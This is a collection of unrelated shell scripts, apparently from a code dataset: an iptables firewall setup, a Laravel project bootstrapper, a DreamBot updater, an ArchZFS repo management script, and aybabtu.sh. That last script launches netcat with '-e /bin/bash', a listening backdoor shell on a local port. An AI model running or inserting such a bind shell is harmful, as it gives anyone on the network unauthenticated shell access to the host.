${IPTABLES} -t filter -A FORWARD -i $inetdev -o $landev -j INETIN
done
echo -n "INETIN "
${IPTABLES} -t filter -A OUTPUT -o $inetdev -j INETOUT
for landev in ${LAN_IFACE} ; do
${IPTABLES} -t filter -A FORWARD -o $inetdev -i $landev -j INETOUT
done
echo -n "INETOUT "
echo
done
if [ "$BRAINDEAD_ISP" = "TRUE" ] ; then
${IPTABLES} -t filter -A INETOUT -p tcp --tcp-flags SYN,RST SYN -j TCPMSS --clamp-mss-to-pmtu
fi
# For now we'll subject the DMZ to the same rules as the internet when going onto the trusted LAN
# And we'll let it go anywhere on the internet
if [ "$DMZ_IFACE" != "" ] ; then
echo -n "Setting up DMZ Chains: "
${IPTABLES} -A OUTPUT -o ${DMZ_IFACE} -j DMZOUT
${IPTABLES} -A FORWARD -i ${LAN_IFACE} -o ${DMZ_IFACE} -j DMZOUT
${IPTABLES} -A FORWARD -i ${INET_IFACE} -o ${DMZ_IFACE} -j ACCEPT
echo -n "DMZOUT "
echo -n "DMZ for Internet Forwarding to INETOUT..."
${IPTABLES} -A DMZOUT -j INETOUT
${IPTABLES} -A INPUT -i ${DMZ_IFACE} -j DMZIN
echo -n "DMZIN "
echo
echo -n "DMZ for LAN and localhost Forwarding to INETIN..."
${IPTABLES} -A FORWARD -i ${DMZ_IFACE} -o ${LAN_IFACE} -j DMZOUT
${IPTABLES} -A FORWARD -i ${DMZ_IFACE} -o ${INET_IFACE} -j ACCEPT
${IPTABLES} -A DMZOUT -o ${LAN_IFACE} -j INETIN
echo "done"
echo -n "done"
fi
# ------------------------------------------------------------------------
# Local traffic to internet or crossing subnets
# This should cover what we need if we don't use masquerading
# Unfortunately, MAC address matching isn't bidirectional (for
# obvious reasons), so IP based matching is done here
echo -n "Local Traffic Rules: "
if [ "$INTERNAL_LAN" != "" ] ; then
for subnet in ${INTERNAL_LAN} ; do
${IPTABLES} -t filter -A INPUT -s ${subnet} -j ACCEPT
${IPTABLES} -t filter -A FORWARD -s ${subnet} -o ! ${INET_IFACE} -i ! ${INET_IFACE} -j ACCEPT
echo -n "${subnet}:ACCEPT "
done
fi
# 127.0.0.0/8 used to need an entry in INTERNAL_LAN, but routing of that isn't needed
# so an allow is placed on INPUT so that the computer can talk to itself :)
${IPTABLES} -t filter -A INPUT -i ${LOOP_IFACE} -j ACCEPT
echo -n "loopback:ACCEPT "
# DHCP server magic
# Allow broadcasts from LAN to UDP port 67 (DHCP server)
if [ "$DHCP_SERVER" = "TRUE" ] ; then
for dev in ${LAN_IFACE} ; do
${IPTABLES} -t filter -A INPUT -i $dev -p udp --dport 67 -j ACCEPT
done
echo -n "dhcp:ACCEPT"
fi
echo #newline from local traffic rules
if [ "$PROXY" != "" ] ; then
echo -n "Setting up Transparent Proxy to ${PROXY}: "
for subnet in ${INTERNAL_LAN} ; do
echo "$PROXY" | {
IFS=':' read host port
if [ "$host" = "localhost" ] || [ "$host" = "127.0.0.1" ] ; then
${IPTABLES} -t nat -A PREROUTING -s ${subnet} -p tcp --dport 80 -j REDIRECT --to-port ${port}
echo -n "${subnet}:PROXY "
else
${IPTABLES} -t nat -A PREROUTING -s ! ${host} -p tcp --dport 80 -j DNAT --to-destination ${host}:${port}
${IPTABLES} -t nat -A POSTROUTING -s ${subnet} -d ${host} -j SNAT --to-source ${MY_IP} #Destination changed in PREROUTING
echo -n "${subnet}:PROXY "
fi
}
done
echo
fi
if [ "$ALLOW_OUT_TCP" != "" ] ; then
echo -n "Internet censorship TCP allows: "
for rule in ${ALLOW_OUT_TCP} ; do
echo "$rule" | {
IFS=':' read intip destip dport
${IPTABLES} -t filter -A FORWARD -s ${intip} -d ${destip} -p tcp --dport ${dport} -o ${INET_IFACE} -j ACCEPT
echo -n "${intip}:${destip} "
}
done
echo
fi
# Set up basic NAT if the user wants it
if [ "$MASQ_LAN" != "" ] ; then
echo -n "Setting up masquerading: "
if [ "$MAC_MASQ" = "" ] ; then
for subnet in ${MASQ_LAN} ; do
${IPTABLES} -t nat -A POSTROUTING -s ${subnet} -o ${INET_IFACE} -j MASQUERADE
echo -n "${subnet}:MASQUERADE "
done
else
for address in ${MAC_MASQ} ; do
${IPTABLES} -t nat -A POSTROUTING -m mac --mac-source ${address} -o ${INET_IFACE} -j MASQUERADE
echo -n "${address}:MASQUERADE "
done
fi
echo
fi
if [ "$SNAT_LAN" != "" ] ; then #Static NAT used
echo -n "Setting up static NAT: "
if [ "$MAC_SNAT" = "" ] ; then
for rule in ${SNAT_LAN} ; do
echo "$rule" | {
IFS=':' read host destip
${IPTABLES} -t nat -A POSTROUTING -s ${host} -o ${INET_IFACE} -j SNAT --to-source ${destip}
echo -n "${host}:SNAT "
}
done
else
for rule in ${MAC_SNAT} ; do
echo "$rule" | {
IFS=':' read address destip
${IPTABLES} -t nat -A POSTROUTING -m mac --mac-source ${address} -o ${INET_IFACE} -j SNAT --to-source ${destip}
echo -n "${address}:SNAT "
}
done
fi
echo
fi
#TCP Port-Forwards
if [ "$TCP_FW" != "" ] ; then
echo -n "TCP Port Forwards: "
for rule in ${TCP_FW} ; do
echo "$rule" | {
IFS=':><' read srcport destport host shost
echo "$srcport" | {
IFS='-' read fsp lsp
if [ "$shost" = "" ] ; then
if [ "$lsp" != "" ] ; then
echo "$destport" | {
IFS='-' read fdp ldp
${IPTABLES} -t nat -A PREROUTING -i ${INET_IFACE} -p tcp --dport ${fsp}:${lsp} -j DNAT --to-destination ${host}:${destport}
}
else
${IPTABLES} -t nat -A PREROUTING -i ${INET_IFACE} -p tcp --dport ${srcport} -j DNAT --to-destination ${host}:${destport}
fi
else
if [ "$lsp" != "" ] ; then
echo "$destport" | {
IFS='-' read fdp ldp
${IPTABLES} -t nat -A PREROUTING -p tcp -d ${shost} --dport ${fsp}:${lsp} -j DNAT --to-destination ${host}:${destport}
}
else
${IPTABLES} -t nat -A PREROUTING -p tcp -d ${shost} --dport ${srcport} -j DNAT --to-destination ${host}:${destport}
fi
fi
echo -n "${rule} "
}
}
done
echo
fi
#UDP Port Forwards
if [ "$UDP_FW" != "" ] ; then
echo -n "UDP Port Forwards: "
for rule in ${UDP_FW} ; do
echo "$rule" | {
IFS=':><' read srcport destport host shost
echo "$srcport" | {
IFS='-' read fsp lsp
if [ "$shost" = "" ] ; then
if [ "$lsp" != "" ] ; then
echo "$destport" | {
IFS='-' read fdp ldp
${IPTABLES} -t nat -A PREROUTING -i ${INET_IFACE} -p udp --dport ${fsp}:${lsp} -j DNAT --to-destination ${host}:${destport}
}
else
${IPTABLES} -t nat -A PREROUTING -i ${INET_IFACE} -p udp --dport ${srcport} -j DNAT --to-destination ${host}:${destport}
fi
else
if [ "$lsp" != "" ] ; then
echo "$destport" | {
IFS='-' read fdp ldp
${IPTABLES} -t nat -A PREROUTING -p udp -d ${shost} --dport ${fsp}:${lsp} -j DNAT --to-destination ${host}:${destport}
}
else
${IPTABLES} -t nat -A PREROUTING -p udp -d ${shost} --dport ${srcport} -j DNAT --to-destination ${host}:${destport}
fi
fi
echo -n "${rule} "
}
}
done
echo
fi
# =================================================
# -------------------ICMP rules--------------------
# =================================================
if [ "$BAD_ICMP" != "" ] ; then
echo -n "${DROP}ing ICMP messages specified in BAD_ICMP..."
for message in ${BAD_ICMP} ; do
${IPTABLES} -t filter -A INETIN -p icmp --icmp-type ${message} -j ${DROP}
echo -n "${message} "
done
echo
fi
# Flood "security"
# You'll still respond to these if they comply with the limits (set in config)
# There is a more elegant way to set this using sysctl, however this has the
# advantage that the kernel ICMP stack never has to process it, lessening
# the chance of a very serious flood overloading your kernel.
# This is just a packet limit, you still get the packets on the interface and
# still may experience lag if the flood is heavy enough
echo -n "Flood limiting: "
# Ping Floods (ICMP echo-request)
${IPTABLES} -t filter -A INETIN -p icmp --icmp-type echo-request -m limit --limit ${PING_FLOOD} -j ACCEPT
${IPTABLES} -t filter -A INETIN -p icmp --icmp-type echo-request -j ${DROP}
echo -n "ICMP-PING "
echo
echo -n "Allowing the rest of the ICMP messages in..."
${IPTABLES} -t filter -A INETIN -p icmp --icmp-type ! echo-request -j ACCEPT
echo "done"
# ================================================================
# ------------Allow stuff we have chosen to allow in--------------
# ================================================================
# Hostwise allows
if [ "$ALLOW_HOSTWISE_TCP" != "" ] ; then
echo -n "Hostwise TCP Allows: "
for rule in ${ALLOW_HOSTWISE_TCP} ; do
echo "$rule" | {
IFS='><' read shost port dhost
echo "$port" | {
IFS='-' read fsp lsp
if [ "$dhost" == "" ] ; then
if [ "$lsp" != "" ] ; then
${IPTABLES} -t filter -A INETIN -p tcp -s ${shost} --dport ${fsp}:${lsp} -j TCPACCEPT
else
${IPTABLES} -t filter -A INETIN -p tcp -s ${shost} --dport ${port} -j TCPACCEPT
fi
else
if [ "$lsp" != "" ] ; then
${IPTABLES} -t filter -A INETIN -p tcp -s ${shost} -d ${dhost} --dport ${fsp}:${lsp} -j TCPACCEPT
else
${IPTABLES} -t filter -A INETIN -p tcp -s ${shost} -d ${dhost} --dport ${port} -j TCPACCEPT
fi
fi
echo -n "${rule} "
}
}
done
echo
fi
if [ "$ALLOW_HOSTWISE_UDP" != "" ] ; then
echo -n "Hostwise UDP Allows: "
for rule in ${ALLOW_HOSTWISE_UDP} ; do
echo "$rule" | {
IFS='><' read shost port dhost
echo "$port" | {
IFS='-' read fsp lsp
if [ "$dhost" == "" ] ; then
if [ "$lsp" != "" ] ; then
${IPTABLES} -t filter -A INETIN -p udp -s ${shost} --dport ${fsp}:${lsp} -j UDPACCEPT
else
${IPTABLES} -t filter -A INETIN -p udp -s ${shost} --dport ${port} -j UDPACCEPT
fi
else
if [ "$lsp" != "" ] ; then
${IPTABLES} -t filter -A INETIN -p udp -s ${shost} -d ${dhost} --dport ${fsp}:${lsp} -j UDPACCEPT
else
${IPTABLES} -t filter -A INETIN -p udp -s ${shost} -d ${dhost} --dport ${port} -j UDPACCEPT
fi
fi
echo -n "${rule} "
}
}
done
echo
fi
if [ "$ALLOW_HOSTWISE_PROTO" != "" ] ; then
echo -n "Hostwise IP Protocol Allows: "
for rule in ${ALLOW_HOSTWISE_PROTO} ; do
echo "$rule" | {
IFS='><' read shost proto dhost
if [ "$dhost" == "" ] ; then
${IPTABLES} -t filter -A INETIN -p ${proto} -s ${shost} -j ACCEPT
else
${IPTABLES} -t filter -A INETIN -p ${proto} -s ${shost} -d ${dhost} -j ACCEPT
fi
echo -n "${rule} "
}
done
echo
fi
echo -n "Allowing established outbound connections back in..."
${IPTABLES} -t filter -A INETIN -m state --state ESTABLISHED -j ACCEPT
echo "done"
# RELATED on high ports only for security
echo -n "Allowing related inbound connections..."
${IPTABLES} -t filter -A INETIN -p tcp --dport 1024:65535 -m state --state RELATED -j TCPACCEPT
${IPTABLES} -t filter -A INETIN -p udp --dport 1024:65535 -m state --state RELATED -j UDPACCEPT
echo "done"
# =================================================
# ----------------Packet Mangling------------------
# =================================================
# TTL mangling
# This is probably just for the paranoid, but hey, isn't that what
# all security guys are? :)
if [ "$TTL_SAFE" != "" ] ; then
${IPTABLES} -t mangle -A PREROUTING -i ${INET_IFACE} -j TTL --ttl-set ${TTL_SAFE}
fi
# Type of Service mangle optimizations (the ACTIVE FTP one will only work for uploads)
# Most routers tend to ignore these, it's probably better to use
# QoS. A packet scheduler like HTB is much more efficient
# at assuring bandwidth availability at the local end than
# ToS is.
if [ "$MANGLE_TOS_OPTIMIZE" = "TRUE" ] ; then
echo -n "Optimizing traffic: "
${IPTABLES} -t mangle -A OUTPUT -p tcp --dport 23 -j TOS --set-tos Minimize-Delay
echo -n "telnet "
${IPTABLES} -t mangle -A OUTPUT -p tcp --dport 22 -j TOS --set-tos Minimize-Delay
echo -n "ssh "
${IPTABLES} -t mangle -A OUTPUT -p tcp --dport 20 -j TOS --set-tos Minimize-Cost
echo -n "ftp-data "
${IPTABLES} -t mangle -A OUTPUT -p tcp --dport 21 -j TOS --set-tos Minimize-Delay
echo -n "ftp-control "
${IPTABLES} -t mangle -A OUTPUT -p udp --dport 4000:7000 -j TOS --set-tos Minimize-Delay
echo -n "diablo2 "
echo
fi
# What to do on those INET chains when we hit the end
echo -n "Setting up INET policies: "
# Drop if we cant find a valid inbound rule.
${IPTABLES} -t filter -A INETIN -j ${DROP}
echo -n "INETIN:${DROP} "
# We can send what we want to the internet
${IPTABLES} -t filter -A INETOUT -j ACCEPT
echo -n "INETOUT:ACCEPT "
echo
# All done!
echo "Done loading the firewall!"
# State Rules for Inbound VPN
${IPTABLES} -t nat -A PREROUTING -i $INET_IFACE -p tcp --dport 1723 -j DNAT --to 192.168.0.8
${IPTABLES} -t nat -A PREROUTING -i $INET_IFACE -p 47 -j DNAT --to 192.168.0.8
# ipSEC (500/tcp and 50-51/ip)
${IPTABLES} -t nat -A PREROUTING -i ${INET_IFACE} -p udp --dport 500 -j DNAT --to 192.168.0.8
${IPTABLES} -t nat -A PREROUTING -i ${INET_IFACE} -p 50 -j DNAT --to 192.168.0.8
${IPTABLES} -t nat -A PREROUTING -i ${INET_IFACE} -p 51 -j DNAT --to 192.168.0.8
echo "Now it is really done,have fun!"
| true
|
a809ffbf682beb1c18b1010fee1e700f2ae448fe
|
Shell
|
ildac/jumpStartLaravel
|
/jumpStartLaravel.sh
|
UTF-8
| 4,683
| 4.5
| 4
|
[] |
no_license
|
#!/bin/sh
# jumpStartLaravel.sh
# An interactive script that does for you the most common operation when setting up a new Laravel project.
# The requirements to run the script are:
# - composer
# - git
# - curl
# - homestead
# Usage:
# jumpStartLaravel.sh -gih -o http://git.your.repo/address -l homestead <projectName>
# Options:
# - -g: initialize the git repository
# - -o: to set the remote repo address (without this no remote repository will be set)
# - -i: download the .gitignore file in the directory
# - -h: add a new site in the Homestead configuration
# - -l <localMachineName>: setup the laravel local environment, by default localMachineName is set to "homestead" that is the default one
#
# Created by ilDac on 27/09/14.
# Updated by ilDac on 30/09/14.
#
# initialization
initializeGitRepo="no"
externalRepoAddress="no"
setupGitIgnore="no"
addSiteToHomesteadConfig="no"
localEvironment="no"
localMachineName="homestead"
#if no project name is specified, composer will use the default project name "laravel"
while getopts "gihl:o:" flag
do
case $flag in
g)
initializeGitRepo="yes"
;;
o)
externalRepoAddress="yes"
originRepoAddress=$OPTARG
;;
i)
setupGitIgnore="yes"
;;
h)
addSiteToHomesteadConfig="yes"
;;
l)
localEvironment="yes"
if [ "$OPTARG" != "" ]; then
localMachineName=$OPTARG
fi
;;
\?)
echo "Invalid option: -$OPTARG" >&2
exit 1
;;
esac
done
#project name is always the last argument passed to the script
projectName="${@: -1}"
#create the new project with composer
echo "Initializating the project via Composer"
composer create-project laravel/laravel $projectName
cd "$projectName"
#configure permissions on folder
echo "Granting write permissions to app/storage"
chmod -R 0777 app/storage
#setup a local environment?
if [ "$localEvironment" == "yes" ] || [ "$localEvironment" == "y" ]; then
echo "Setting up Laravel local environment"
if ([ "$localMachineName" != "homestead" ] && [ "$localMachineName" != "" ]); then
find bootstrap -name 'start.php' -exec sed -i '' -e 's/homestead/'"$localMachineName"'/g' {} \;
echo "Local environment name set to $localMachineName"
fi
fi
#git initialization
if [ "$initializeGitRepo" == "yes" ] || [ "$initializeGitRepo" == "y" ]; then
git init
echo "Git repository initialized in the project root"
#add external repository for the project (like bitbucket or github)?
if [ "$externalRepoAddress" == "yes" ] || [ "$externalRepoAddress" == "y" ]; then
git remote add origin "$originRepoAddress"
echo "Added remote repository origin: $originRepoAddress"
fi
#.gitignore autodownload from github download .gitingnore from here:
if [ "$setupGitIgnore" == "yes" ] || [ "$setupGitIgnore" == "y" ]; then
echo "Downloading the .gitignore from the official Laravel repository"
curl -o .gitignore https://raw.githubusercontent.com/laravel/laravel/master/.gitignore;
echo ".gitignore added in your project root"
fi
fi
#setup homestead machine for the new site
if [ "$addSiteToHomesteadConfig" == "yes" ] || [ "$addSiteToHomesteadConfig" == "y" ]; then
#TODO: i can read also the configuration to get the root path and add the one of the project...
#ask for the path to your homestead Folder...
echo "Enter the location of your Homestead root folder: [default: ../../]"
echo "Just the path to the folder do not enter the folder name (Homestead)"
read homesteadRootPath;
if [ "$homesteadRootPath" == "" ]; then
homesteadRootPath="../../"
fi
#ask for the local address to use
echo "Enter the local address to use (i.e.: example.loc): "
read mapLocalAddress;
#ask for the vagrant path to map this local address
echo "Enter the path that has to be mapped to this address: "
read toPath;
#this add the site to the conf, it can be done in a more elegant way, but this works...
cd "$homesteadRootPath"/Homestead
mv Homestead.yaml homestead.bk
sed '/^'sites'/,/^[{space,tab}]*$/{ # [{space,tab}]
/'sites:'/ {
a\
\ - map: '"$mapLocalAddress"'
a\
\ to: '"$toPath"'
}
}' <homestead.bk > Homestead.yaml
rm homestead.bk
echo "Site added to the Homestead configuration"
#add the local address to the /etc/hosts file
echo "Adding the local address to your /etc/hosts file (can require the sudo password)"
sudo -- sh -c "echo 127.0.0.1 $mapLocalAddress >> /etc/hosts";
echo "/etc/hosts updated with $mapLocalAddress"
else
echo "No Homestead site setup";
fi
echo "Done. What are you waiting for...start working!"
| true
|
fe9be2e0a893e3fccb0ac608b5dfae2f6432674f
|
Shell
|
Nik-Novak/OSBotFarm
|
/game-client/docker/internal-scripts/scripts/check-update.sh
|
UTF-8
| 435
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/bash
cd $BASEDIR
echo "Checking for DreamBot updates..."
(cd /tmp && curl -L https://dreambot.org/DBLauncher.jar -O)
if [ $(cmp /tmp/DBLauncher.jar DreamBot/DBLauncher.jar) ]
then
echo "DreamBot was out of date, updating..."
mv /tmp/DBLauncher.jar DreamBot/DBLauncher.jar
chmod +x DreamBot/DBLauncher.jar
echo "DreamBot updated successfully!"
else
rm /tmp/DBLauncher.jar
echo "DreamBot was already up-to-date."
fi
| true
|
11458d7d5e27e135e76b9aa5d8912644533fc713
|
Shell
|
nineten/aybabtu
|
/aybabtu.sh
|
UTF-8
| 592
| 3.3125
| 3
|
[] |
no_license
|
#!/bin/bash
if ps -ef | grep nc | grep "-e /bin/bash" ; then
echo "aybabtu already running"
exit 0
else
echo "starting aybabtu"
/sbin/ifconfig en1 | grep 'inet ' | cut -d' ' -f2
read lowerPort upperPort <<< $(/usr/sbin/sysctl net.inet.ip.portrange.first net.inet.ip.portrange.last | cut -d':' -f2 | cut -d' ' -f2)
echo $lowerPort
/usr/local/bin/nc -l -p $lowerPort -e /bin/bash &
exit 0
fi
#this loop is interesting. makes it hard to kill the processes
#while :; do
#for (( port = lowerPort ; port <= upperPort ; port++ )); do
#nc -l -p "$port" -e /bin/bash && break
#done
#done
| true
|
01b54db2c352e16071da3bf699f4ab71c4966dc5
|
Shell
|
archzfs/archzfs
|
/repo.sh
|
UTF-8
| 16,818
| 4.375
| 4
|
[] |
no_license
|
#!/bin/bash
#
# repo.sh adds the archzfs packages to the archzfs repository or archzfs-testing repository
#
args=("$@")
script_name=$(basename $0)
script_dir="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
repo_name="" # The destination repo for the packages
package_list=() # A list of packages to add. Array items are in the form of "name;pkg.tar.xz;repo_path".
package_src_list=() # A list of package sources to move
package_exist_list=()
all_added_pkgs=() # A list of all packages, that were added to the repo
haz_error=0
if ! source ${script_dir}/lib.sh; then
echo "!! ERROR !! -- Could not load lib.sh!"
exit 155
fi
source_safe "${script_dir}/conf.sh"
usage() {
echo "${script_name} - Adds the compiled packages to the archzfs repo."
echo
echo "Usage: ${script_name} [options] (mode) (repo)"
echo
echo "Options:"
echo
echo " -h: Show help information."
echo " -n: Dryrun; Output commands, but don't do anything."
echo " -d: Show debug info."
echo " -s: Sign packages only."
echo " -p: Do not sync from remote repo."
echo " -r: Remove the given packages"
echo
echo "Modes:"
echo
for ml in "${mode_list[@]}"; do
mn=$(echo ${ml} | cut -f2 -d:)
md=$(echo ${ml} | cut -f3 -d:)
if [[ ${#mn} -gt 3 ]]; then
echo -e " ${mn}\t ${md}"
else
echo -e " ${mn}\t\t ${md}"
fi
done
echo " all Select and use all available packages"
echo
echo "Repository target:"
echo
echo " azfs Use the archzfs repo. Used by default."
echo " test Use the archzfs-testing repo."
echo " ccm Install packages to the clean-chroot-manager's repo. Useful incase the chroot neeeds to be nuked."
echo " repo=<repo> Install packages to a custom repo."
echo
echo "Example Usage:"
echo
echo " ${script_name} lts azfs -n -d :: Show output commands and debug info."
exit 155
}
generate_mode_list
if [[ $# -lt 1 ]]; then
usage
fi
for (( a = 0; a < $#; a++ )); do
if [[ ${args[$a]} == "azfs" ]]; then
repo_name=${repo_basename}
pull_remote_repo=1
elif [[ ${args[$a]} == "test" ]]; then
repo_name="${repo_basename}-testing"
pull_remote_testing_repo=1
elif [[ ${args[$a]} =~ repo=(.*) ]]; then
repo_name=${BASH_REMATCH[1]}
elif [[ ${args[$a]} == "ccm" ]]; then
repo_name="clean-chroot-manager"
elif [[ ${args[$a]} == "-s" ]]; then
sign_packages=1
elif [[ ${args[$a]} == "-p" ]]; then
no_pull_remote=1
elif [[ ${args[$a]} == "-r" ]]; then
remove_packages=1
elif [[ ${args[$a]} == "-n" ]]; then
dry_run=1
elif [[ ${args[$a]} == "-d" ]]; then
debug_flag=1
elif [[ ${args[$a]} == "-h" ]]; then
usage
elif [[ ${remove_packages} -eq 1 ]]; then
modes+=("${args[$a]}")
else
check_mode "${args[$a]}"
debug "have modes '${modes[*]}'"
fi
done
package_backup_dir="${repo_basepath}/archive_${repo_name}"
if [[ $# -lt 1 ]]; then
usage
fi
if [[ ${#modes[@]} -eq 0 ]]; then
echo
error "A mode must be selected!"
usage
fi
if [[ ${repo_name} == "" ]]; then
error "No destination repo specified!"
exit 155
fi
pull_repo() {
msg "Downloading remote repo..."
if [[ ${dry_run} -eq 1 ]]; then
dry="-n"
fi
run_cmd "mkdir -p ${repo_basepath}/archive_${repo_basename}"
run_cmd "rsync -vrtlh --delete-before ${remote_login}:${repo_remote_basepath}/${repo_name} ${repo_basepath}/ ${dry}"
run_cmd_check 1 "Could not pull packages from remote repo!"
}
pull_testing_repo() {
msg "Downloading remote testing repo..."
if [[ ${dry_run} -eq 1 ]]; then
dry="-n"
fi
run_cmd "mkdir -p ${repo_basepath}/archive_${repo_basename}-testing"
run_cmd "rsync -vrtlh --delete-before ${remote_login}:${repo_remote_basepath}/${repo_basename}-testing ${repo_basepath}/ ${dry}"
run_cmd_check 1 "Could not pull packages from remote testing repo!"
}
repo_package_list() {
msg "Generating a list of packages to add..."
debug_print_array "pkg_list" "${pkg_list[@]}"
package_list=()
local pkgs=()
if [[ ${#pkg_list[@]} -eq 1 ]]; then
local pkg_list_find=${pkg_list[0]}
else
local pkg_list_find="{$(printf '%s,' ${pkg_list[@]} | cut -d ',' -f 1-${#pkg_list[@]})}"
fi
# Get packages from the backup directory
path="packages/${kernel_name}/${pkg_list_find}/"
if [[ ! -z ${kernel_version_pkgver} ]]; then
debug "kernel_version_pkgver: ${kernel_version_pkgver}"
fcmd="find ${path} -iname '*${kernel_version_pkgver}-${zfs_pkgrel}*.pkg.tar.zst' "
run_cmd_no_output_no_dry_run "${fcmd}"
for pkg in ${run_cmd_output}; do
pkgs+=(${pkg})
done
elif [[ ! -z ${zfs_pkgver} ]]; then
debug "zfs_pkgver: ${zfs_pkgver}"
fcmd="find ${path} -iname '*${zfs_pkgver}-${zfs_pkgrel}*.pkg.tar.zst' "
run_cmd_no_output_no_dry_run "${fcmd}"
for pkg in ${run_cmd_output}; do
pkgs+=(${pkg})
done
else
debug "kernel_version_pkgver and zfs_pkgver not set!"
debug "Falling back to newest package by mod time for zfs"
for z in $(printf '%s ' ${pkg_list[@]} ); do
fcmd="find packages/${kernel_name} -iname '*${z}*.pkg.tar.zst' -printf '%T@ %p\\n' | sort -n | tail -2 | cut -f2- -d' '"
run_cmd_no_output_no_dry_run "${fcmd}"
for pkg in ${run_cmd_output}; do
pkgs+=(${pkg})
done
done
fi
debug_print_array "pkgs" ${pkgs[@]}
for pkg in ${pkgs[@]}; do
arch=$(package_arch_from_path ${pkg})
name=$(package_name_from_path ${pkg})
vers=$(package_version_from_path ${pkg})
if ! [[ ${name} =~ .*-git ]]; then
# Version match check: arch: x86_64 name: spl-utils-linux-git vers: 0.7.0_rc1_r0_g4fd75d3_4.7.2_1-4 vers_match: 0.6.5.8.*4.7.2_1-4
debug "zfs_pkgver: ${zfs_pkgver}"
debug "kernel_version_pkgver: ${kernel_version_pkgver}"
kernvers=""
# append kernel version if set
if [ ! -z "${kernel_version_pkgver}" ]; then
kernvers="_${kernel_version_pkgver}";
fi
if [[ ${pkg} =~ .*zfs-.* ]]; then
match="${zfs_pkgver}${kernvers}-${zfs_pkgrel}"
fi
debug "Version match check: arch: ${arch} name: ${name} vers: ${vers} vers_match: ${match}"
if ! [[ ${vers} =~ ^${match} ]] ; then
debug "Version mismatch!"
continue
fi
fi
# check if package version is already in repo
if [ -f "${repo_target}/${arch}/${name}-${vers}-${arch}.pkg.tar.zst" ]; then
msg2 "Package ${name}=${vers} already in repo. Skipping"
continue
fi
debug "Using: pkgname: ${name} pkgver: ${vers} pkgpath: ${pkg} pkgdest: ${repo_target}/${arch}"
if [[ ${repo_name} == "chroot_local" ]]; then
package_list+=("${name};${vers};${pkg};${repo_target}")
else
package_list+=("${name};${vers};${pkg};${repo_target}/${arch}")
fi
pkgsrc="packages/${kernel_name}/${name}/${name}-${vers}.src.tar.gz"
if [[ -f "${pkgsrc}" ]]; then
package_src_list+=("${pkgsrc}")
fi
pkgdbg="packages/${kernel_name}/${name}/${name}-debug-${vers}-${arch}.pkg.tar.zst"
if [[ -f "${pkgsrc}" ]]; then
package_src_list+=("${pkgsrc}")
fi
done
debug_print_array "package_list" ${package_list[@]}
debug_print_array "package_src_list" ${package_src_list[@]}
}
repo_package_backup() {
msg "Getting a list of packages to backup..."
local pkgs=()
for ipkg in ${package_list[@]}; do
IFS=';' read -a pkgopt <<< "${ipkg}"
name="${pkgopt[0]}"
vers="${pkgopt[1]}"
pkgp="${pkgopt[2]}"
dest="${pkgopt[3]}"
debug "pkg: ${name}"
local o=""
if [[ ${#pkgs[@]} -ne 0 ]]; then
local o="-o"
fi
pkgs+=("$o -regextype egrep -regex '.*${name}-[a-z0-9\.\_]+-[0-9]+-x86_64.pkg.tar.(xz|zst)'")
done
# only run find, if new packages will be copied
if [[ ! ${#pkgs[@]} -eq 0 ]]; then
run_cmd_show_and_capture_output_no_dry_run "find ${repo_target} -type f ${pkgs[@]}"
for x in ${run_cmd_output}; do
debug "Evaluating ${x}"
pkgname=$(package_name_from_path ${x})
pkgvers=$(package_version_from_path ${x})
debug "pkgname: ${pkgname}"
debug "pkgvers: ${pkgvers}"
# asterisk globs the package signature
epkg="${repo_target}/x86_64/${pkgname}-${pkgvers}*"
debug "backing up package: ${epkg}"
package_exist_list+=("${epkg}")
done
fi
if [[ ${#package_exist_list[@]} -eq 0 ]]; then
msg2 "No packages found for backup."
return
fi
debug_print_array "package_exist_list" "${package_exist_list[@]}"
msg "Backing up existing packages..."
run_cmd "mv ${package_exist_list[@]} ${package_backup_dir}/"
}
repo_add() {
if [[ ${#package_list[@]} == 0 ]]; then
error "No packages to process!"
return
fi
debug_print_array "package_list" ${#package_list}
local pkg_cp_list=()
local pkg_add_list=()
local dest=""
local arch="x86_64"
for ipkg in ${package_list[@]}; do
IFS=';' read -a pkgopt <<< "${ipkg}"
name="${pkgopt[0]}"
vers="${pkgopt[1]}"
pkgp="${pkgopt[2]}"
dest="${pkgopt[3]}"
msg2 "Processing package ${name}-${vers} to ${dest}"
[[ ! -d ${dest} ]] && run_cmd "mkdir -p ${dest}"
debug "name: ${name} vers: ${vers} pkgp: ${pkgp} dest: ${dest}"
pkg_cp_list+=("${pkgp}")
pkg_cp_list+=("${pkgp}.sig")
bname=$(basename ${pkgp})
pkg_add_list+=("${dest}/${bname}")
all_added_pkgs+=("${bname}")
done
debug_print_array "pkg_cp_list" "${pkg_cp_list[@]}"
debug_print_array "pkg_add_list" "${pkg_add_list[@]}"
msg "Copying the new ${arch} packages to the repo..."
if [[ ${repo_name} == "chroot_local" ]]; then
run_cmd "cp -fv ${pkg_cp_list[@]} ${package_src_list[@]} ${repo_target}/"
else
run_cmd "cp -fv ${pkg_cp_list[@]} ${package_src_list[@]} ${repo_target}/${arch}/"
fi
if [[ ${run_cmd_return} -ne 0 ]]; then
error "An error occurred copying the packages to the repo!"
exit 1
fi
if [[ ${repo_name} == "chroot_local" ]]; then
run_cmd "repo-add ${repo_target}/${repo_name}.db.tar.gz ${pkg_add_list[@]}"
# append the local repo to the chroot's pacman.conf
repo_root=$(dirname ${repo_target})
if [[ -z $(grep clean-chroot ${repo_root}/etc/pacman.conf) ]]; then
# add a local repo to chroot
run_cmd_no_output "sed -i '/\\\[testing\\\]/i # Added by clean-chroot-manager\\\n\\\[chroot_local\\\]\\\nSigLevel = Never\\\nServer = file:///repo\\\n' ${repo_root}/etc/pacman.conf $(realpath ${repo_root}/../)/${makepkg_nonpriv_user}/etc/pacman.conf"
fi
run_cmd_no_output "sudo rsync --chown=${makepkg_nonpriv_user}: -ax ${repo_root}/repo/ $(realpath ${repo_root}/../)/${makepkg_nonpriv_user}/repo/"
else
run_cmd "repo-add -k ${gpg_sign_key} -s -v ${repo_target}/${arch}/${repo_name}.db.tar.xz ${pkg_add_list[@]}"
fi
if [[ ${run_cmd_return} -ne 0 ]]; then
error "An error occurred adding the package to the repo!"
exit 1
fi
}
sign_packages() {
if [[ ${#package_list[@]} == 0 ]]; then
error "No packages to process!"
return
fi
for ipkg in "${package_list[@]}"; do
IFS=';' read -a pkgopt <<< "${ipkg}"
name="${pkgopt[0]}"
vers="${pkgopt[1]}"
pkgp="${pkgopt[2]}"
dest="${pkgopt[3]}"
if [[ ! -f "${pkgp}.sig" ]]; then
